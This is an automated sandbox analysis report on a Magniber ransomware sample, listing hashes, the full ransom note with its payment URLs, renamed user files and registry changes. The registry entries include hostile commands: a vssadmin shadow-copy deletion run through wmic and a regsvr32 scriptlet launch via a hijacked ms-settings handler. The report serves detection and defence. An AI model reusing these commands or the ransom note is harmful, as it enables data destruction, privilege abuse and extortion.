magniber | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367

Analysis

max time kernel
150s
max time network
135s
platform
windows10_x64
resource
win10-en-20211014
submitted
22-11-2021 19:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Size

22KB
MD5

7906dc475a8ae55ffb5af7fd3ac8f10a
SHA1

e7304e2436dc0eddddba229f1ec7145055030151
SHA256

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367
SHA512

c087b3107295095e9aca527d02b74c067e96ca5daf5457e465f8606dbf4809027faedf65d77868f6fb8bb91a1438e3d0169e59efddf1439bbd3adb3e23a739a1

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://50649e386e7ca270c6eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://50649e386e7ca270c6eltalkfzj.jobsbig.cam/eltalkfzj http://50649e386e7ca270c6eltalkfzj.boxgas.icu/eltalkfzj http://50649e386e7ca270c6eltalkfzj.sixsees.club/eltalkfzj http://50649e386e7ca270c6eltalkfzj.nowuser.casa/eltalkfzj Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://50649e386e7ca270c6eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj

http://50649e386e7ca270c6eltalkfzj.jobsbig.cam/eltalkfzj

http://50649e386e7ca270c6eltalkfzj.boxgas.icu/eltalkfzj

http://50649e386e7ca270c6eltalkfzj.sixsees.club/eltalkfzj

http://50649e386e7ca270c6eltalkfzj.nowuser.casa/eltalkfzj

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 14 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1304	2916	cmd.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4788	2916	cmd.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1516	2916	cmd.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1392	2916	cmd.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1804	2916	cmd.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3728	2916	cmd.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4964	2916	cmd.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4200	2916	cmd.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2704	2916	cmd.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1216	2916	cmd.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	952	2916	cmd.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5004	2916	cmd.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3960	2916	cmd.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4180	2916	cmd.exe	86

Modifies extensions of user files 13 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\NewUndo.crw => C:\Users\Admin\Pictures\NewUndo.crw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\ResetRead.crw => C:\Users\Admin\Pictures\ResetRead.crw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\ExitUninstall.png => C:\Users\Admin\Pictures\ExitUninstall.png.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\GroupUnlock.tif => C:\Users\Admin\Pictures\GroupUnlock.tif.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\DebugMerge.crw => C:\Users\Admin\Pictures\DebugMerge.crw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\DismountDisable.crw => C:\Users\Admin\Pictures\DismountDisable.crw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\ExitHide.crw => C:\Users\Admin\Pictures\ExitHide.crw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\LimitResolve.raw => C:\Users\Admin\Pictures\LimitResolve.raw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\SwitchTest.png => C:\Users\Admin\Pictures\SwitchTest.png.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\ClearSplit.crw => C:\Users\Admin\Pictures\ClearSplit.crw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\UnpublishUnprotect.raw => C:\Users\Admin\Pictures\UnpublishUnprotect.raw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\FindCompress.png => C:\Users\Admin\Pictures\FindCompress.png.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\UseImport.png => C:\Users\Admin\Pictures\UseImport.png.eltalkfzj	sihost.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation	cmd.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 3952 set thread context of 2344	3952	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	36
PID 3952 set thread context of 2352	3952	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	35
PID 3952 set thread context of 2444	3952	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	13
PID 3952 set thread context of 2880	3952	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	27
PID 3952 set thread context of 3568	3952	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	25
PID 3952 set thread context of 3860	3952	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	24

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4040	3860	WerFault.exe	24

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "3r85h8o"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 010000009477a60d0688b275b6e245a3b92e954e9c36fb40fa5a7d9bd339ca8a49b999c4dce678b32d5aa2b7380cc10764b493672e993619f314b262e9b9	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\FileVersion = "2016061511"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CTLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194\Children\S-1-15-2-36240 = "microsoft.microsoftedge_8wekyb3d8bbwe/121"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = e9e08c17d4dfd701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\ChildCapabilities	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 15b1501dd4dfd701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates\4EEF7FAF0062D34ABE = 0300000001000000140000004eef7faf0062d34abee6137e774438ae9988739f04000000010000001000000024d7172657e6b799f66cf32ae88b5c280f0000000100000020000000547b3c62613c9c2b025d5461623ae703e9853ee45a8bf3b425bf63528e992912140000000100000014000000fe7e60dd9d8292295edf1cf80869a75b98896ed01900000001000000100000002aac2185e0e1b6503eb16a495b1815fc5c0000000100000004000000000800001800000001000000100000002d581a49c8eb5b3b3c6ef9bb65314d702000000001000000eb050000308205e7308203cfa003020102021333000001a636dabe8bbe573d9a0000000001a6300d06092a864886f70d01010b0500307e310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e312830260603550403131f4d6963726f736f667420536563757265205365727665722043412032303131301e170d3231303331313139323835325a170d3232303631313139323835325a3081a9310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e310d300b060355040b130442696e67311b301906035504031312494520496e737472756d656e746174696f6e3127302506092a864886f70d010901161862696e6769657465616d406d6963726f736f66742e636f6d30820122300d06092a864886f70d01010105000382010f003082010a0282010100d0b49f5b650f0fa690df343367a2cd62155e98e3c0fc14cb1f696618be8c327ef257f50d47bce3a4286e36edc0382e0ac81096dbce62463bb552970d01d02a7ca642d6faed9b5878c4e2e33e7c9f94ea4eb7f125662d5d2fe78138ce3e827bd98969028a908fab20632542a1ef952c10382b7efcaae1f5e7521d5fb617a93aa002b579a3203726111c73a9832712e3b5d4d140b247c91824de8123b45ea39fbcdb6e5c77d68cd3db64dd24844a1879865356f655cf1c5d94b208e244bd075a9823c87af7bcad6aab52e3444aad2947a7baad0d42c9d785964dbd8b4e09004359094d0646c3ca98e7c698b0fa7d6f1606b1459fd6df8d9aea8ae85911789bc5e10203010001a38201303082012c300e0603551d0f0101ff0404030204f030150603551d25040e300c060a2b0601040182374c0c01301d0603551d0e04160414fe7e60dd9d8292295edf1cf80869a75b98896ed0301f0603551d230418301680143656896549cb5b9b2f3cac4216504d91b933d79130530603551d1f044c304a3048a046a0448642687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b696f70732f63726c2f4d69635365635365724341323031315f323031312d31302d31382e63726c306006082b0601050507010104543052305006082b060105050730028644687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b696f70732f63657274732f4d69635365635365724341323031315f323031312d31302d31382e637274300c0603551d130101ff04023000300d06092a864886f70d01010b05000382020100c1055e1c6ece899cbff031668bd0b72ee668484f9392c48efe112ba21c521af47582849539f2fd53f7f8adecc243743211150de90b106e6bdaaedb88a8fc71aff2bd4bfeae5628507aa3b47095bf680a0a56bc6cb9c70871fa0b05857bf1762af884469264870c4139f7f9e93bbedaf73a867994c51e7c8473506f1ca68a8f9059cfa5c068be7ecade98315eebd7e71431ebe7d033b4fc8056d94ab70b03e1368082fc83a82cd632b9f3a03f9c9d51881c39b432ee9856e87835bc0481e57489da3590d20b2b9b0900704de861f994d956a2c0347178c59e5048bb9bbfbe8cef237d5860d7f407dcbce486eee7d98a90509a8f1b81445453326b139f0d2fdc68b831681fa96f2284b8153e3dbe60cb2d0ac030d0e2ecfc85c9d361c25e01cabe57cd6ebdc40708b2bd449152e90d2d45d725db856ab64d29a9fdb9fdb85f6354cbd5be240f4b71fa745db8eb32c0e4ea4747bfa5a4f9a5346e42b3379636d05e52225cea1baa7792b8f51b803658026b11fd0ab5877a99f4e74ff994c61177ea425554a7135d8b020661d2d285eb8bf1aa00d3bf78e2f5dba62cd7befdb85fffe6c1b65643f56fe36cf412f366b03bc8c78c852c1ed43a218256636d67eb8241477d3258af4f96b9698b0326d6d01826734eb18f1b393cbf85c0f9fdab4fb854536110f2f678003f80f270cbb1fbeb5ba09523f959dfeba84319577874e4dec0	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\Certificates	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
